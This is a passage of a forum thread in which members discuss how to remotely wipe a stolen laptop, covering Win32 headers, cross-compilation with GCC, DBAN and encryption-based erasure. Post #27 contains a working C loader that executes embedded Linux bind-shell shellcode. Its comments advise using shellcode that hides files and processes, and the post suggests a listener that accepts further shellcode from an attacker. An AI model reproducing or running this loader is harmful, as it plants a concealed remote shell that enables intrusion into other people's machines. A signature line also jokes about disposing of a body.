Page 3 of 6 FirstFirst 12345 ... LastLast
Results 21 to 30 of 58

Thread: Sanitising a computer remotely

  1. #21
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    15

    Default

    Quote Originally Posted by Virchanza View Post
    What exactly does that machine code do? I don't suppose you have the original source code from which it was produced? If it opens a port of 4444 then which daemon is listening? And how do you interact with that daemon to get it to execute code?

    Another problem is that the victim machine will always be behind a NAT-router, and also the firewall on the computer itself will probably block the traffic.

    @pureh@te:
    I dunno if you're being sarcastic but here's a explanation nonetheless... Some C compilers offer "compiler extensions" which aren't a part of the C standard; this particular program doesn't contain any compiler externsions, it just won't compile because you don't have the necessary header files and object files for the Win32 API.
    I am no expert either but from the comment of his post where he says you can goto metasploit and use any shellcode I like, well I can use any shellcode I like.

  2. #22
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    Quote Originally Posted by Virchanza View Post
    What exactly does that machine code do? I don't suppose you have the original source code from which it was produced? If it opens a port of 4444 then which daemon is listening? And how do you interact with that daemon to get it to execute code?

    Another problem is that the victim machine will always be behind a NAT-router, and also the firewall on the computer itself will probably block the traffic.

    @pureh@te:
    I dunno if you're being sarcastic but here's a explanation nonetheless... Some C compilers offer "compiler extensions" which aren't a part of the C standard; this particular program doesn't contain any compiler externsions, it just won't compile because you don't have the necessary header files and object files for the Win32 API.
    Virchanza, No I was not being sarcastic My C is pretty poor and I was honestly asking the question. I cant figure out what package I need which contains the win32 libs for my system.

  3. #23
    Very good friend of the forum Virchanza's Avatar
    Join Date
    Jan 2010
    Posts
    863

    Default

    Quote Originally Posted by pureh@te View Post
    Virchanza, No I was not being sarcastic My C is pretty poor and I was honestly asking the question. I cant figure out what package I need which contains the win32 libs for my system.
    The laptop that was stolen has Windows on it, so Compaq posted code to be compiled to an executable file that will run on Windows.

    Win32 refers to "Microsoft Windows 32-Bit", you won't be able to get the library for Linux. (And thankfully so).

    The Win32 Application Programming Interface (API for short), is the set of functions that a Win32 function can use to do stuff in Windows. For instance, if I wanted to make a message box appear in Windows, I could call the "MessageBoxW" function which is a part of the Win32 API.
    Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".

  4. #24
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Default

    There's probably a way to get dban to run on boot. It runs in memory, so once it's running it won't need the drive anymore. Though it's already been said, the info has probably been pulled already.
    Of course, if you really wanted to have some fun, go to Wal-Mart late at night and ask the greeter if they could help you find trashbags, roll of carpet, rope, quicklime, clorox and a shovel. See if they give you any strange looks. --Streaker69

  5. #25
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    Quote Originally Posted by Virchanza View Post
    The laptop that was stolen has Windows on it, so Compaq posted code to be compiled to an executable file that will run on Windows.

    Win32 refers to "Microsoft Windows 32-Bit", you won't be able to get the library for Linux. (And thankfully so).

    The Win32 Application Programming Interface (API for short), is the set of functions that a Win32 function can use to do stuff in Windows. For instance, if I wanted to make a message box appear in Windows, I could call the "MessageBoxW" function which is a part of the Win32 API.
    I understand all of that just fine but I was under the impression that C code with the winsock2.h and windows.h could still be compiled with GCC in order to run on a windows machine. What I mean is if I only had a *nix box and I wanted to compile this to upload to a windows box. Is there no way to do that in GCC. I understand its a windows executable.

  6. #26
    Very good friend of the forum Virchanza's Avatar
    Join Date
    Jan 2010
    Posts
    863

    Default

    Quote Originally Posted by pureh@te View Post
    I understand all of that just fine but I was under the impression that C code with the winsock2.h and windows.h could still be compiled with GCC in order to run on a windows machine. What I mean is if I only had a *nix box and I wanted to compile this to upload to a windows box. Is there no way to do that in GCC. I understand its a windows executable.
    OK, I'm with you

    What you're referring to is known as "cross-compilation". Cross-compilation is where you use Computer Type A to compile a program that will run on Computer Type B. So for instance, if you compiled a Windows program using a compiler on a Linux machine, that would be cross-compilation.

    The only cross-compilation I've ever done is using my laptop to compile a program for an 8-Bit microcontroller :P

    Here's an excerpt from Wikipedia http://en.wikipedia.org/wiki/Cross-compiling:

    "GCC, a free software collection of compilers, can be set up to cross compile. It supports many platforms and languages. However, due to limited volunteer time and the huge amount of work it takes to maintain working cross compilers, in many releases some of the cross compilers are broken."
    Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".

  7. #27
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    I understand all of that just fine but I was under the impression that C code with the winsock2.h and windows.h could still be compiled with GCC in order to run on a windows machine. What I mean is if I only had a *nix box and I wanted to compile this to upload to a windows box. Is there no way to do that in GCC. I understand its a windows executable.
    The last line that loads the shellcode should(havn't tested) run in linux with gcc, the coulpe lines above don't need to be there as the shellcode from metasploit will inizlates the sockets, but hidden the window with the top two lines is windows only, i don't know the code for linux(but they don't need to be there. Use shellcode for linux and it should work.

    linux code
    Code:
     
    #include <stdio.h>
    
    
    unsigned char bindcode[] =                  ////////////////get linux shell code
    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce"
    "\x25\x78\x47\x83\xeb\xfc\xe2\xf4\x32\x4f\x93\x0a\x26\xdc\x87\xb8"
    "\x31\x45\xf3\x2b\xea\x01\xf3\x02\xf2\xae\x04\x42\xb6\x24\x97\xcc"
    "\x81\x3d\xf3\x18\xee\x24\x93\x0e\x45\x11\xf3\x46\x20\x14\xb8\xde"
    "\x62\xa1\xb8\x33\xc9\xe4\xb2\x4a\xcf\xe7\x93\xb3\xf5\x71\x5c\x6f"
    "\xbb\xc0\xf3\x18\xea\x24\x93\x21\x45\x29\x33\xcc\x91\x39\x79\xac"
    "\xcd\x09\xf3\xce\xa2\x01\x64\x26\x0d\x14\xa3\x23\x45\x66\x48\xcc"
    "\x8e\x29\xf3\x37\xd2\x88\xf3\x07\xc6\x7b\x10\xc9\x80\x2b\x94\x17"
    "\x31\xf3\x1e\x14\xa8\x4d\x4b\x75\xa6\x52\x0b\x75\x91\x71\x87\x97"
    "\xa6\xee\x95\xbb\xf5\x75\x87\x91\x91\xac\x9d\x21\x4f\xc8\x70\x45"
    "\x9b\x4f\x7a\xb8\x1e\x4d\xa1\x4e\x3b\x88\x2f\xb8\x18\x76\x2b\x14"
    "\x9d\x76\x3b\x14\x8d\x76\x87\x97\xa8\x4d\x7c\x05\xa8\x76\xf1\xa6"
    "\x5b\x4d\xdc\x5d\xbe\xe2\x2f\xb8\x18\x4f\x68\x16\x9b\xda\xa8\x2f"
    "\x6a\x88\x56\xae\x99\xda\xae\x14\x9b\xda\xa8\x2f\x2b\x6c\xfe\x0e"
    "\x99\xda\xae\x17\x9a\x71\x2d\xb8\x1e\xb6\x10\xa0\xb7\xe3\x01\x10"
    "\x31\xf3\x2d\xb8\x1e\x43\x12\x23\xa8\x4d\x1b\x2a\x47\xc0\x12\x17"
    "\x97\x0c\xb4\xce\x29\x4f\x3c\xce\x2c\x14\xb8\xb4\x64\xdb\x3a\x6a"
    "\x30\x67\x54\xd4\x43\x5f\x40\xec\x65\x8e\x10\x35\x30\x96\x6e\xb8"
    "\xbb\x61\x87\x91\x95\x72\x2a\x16\x9f\x74\x12\x46\x9f\x74\x2d\x16"
    "\x31\xf5\x10\xea\x17\x20\xb6\x14\x31\xf3\x12\xb8\x31\x12\x87\x97"
    "\x45\x72\x84\xc4\x0a\x41\x87\x91\x9c\xda\xa8\x2f\x3e\xaf\x7c\x18"
    "\x9d\xda\xae\xb8\x1e\x25\x78\x47";
    
    
    
    int main()
    {
    ((void (*)(void)) &bindcode)();   ////////////the program will stay running when it loads bindcode, use shellcode that will hide files and process.
    }
    Another note if you set this up with a socket listener you could ask for the attacker to send shellcode, and get it to run larger shellcode say you can only use a small shellcode with exploit.

  8. #28
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    Cool. Thanks for clearing it up.

  9. #29
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    12

    Default

    Hi All,

    I am not an expert in this area, but simple drive wipes might still be recoverable using disk forensic tools. Would it be feasible to encrypt the data in place and destroy the crypto key as an alternative?

    Just an idea.

  10. #30
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Quote Originally Posted by S7oneGhos7 View Post
    Hi All,

    I am not an expert in this area, but simple drive wipes might still be recoverable using disk forensic tools. Would it be feasible to encrypt the data in place and destroy the crypto key as an alternative?

    Just an idea.
    Since the data already was stored once in plain unencrypted format it would be just as recoverable after this as after simply being destroyed in the first place. Or actually that is incorrect, as you are suggesting to simply destroy the encryption key the actual data would still remain and you would in addition have the option to bruteforce the key to recover the data.
    -Monkeys are like nature's humans.

Page 3 of 6 FirstFirst 12345 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •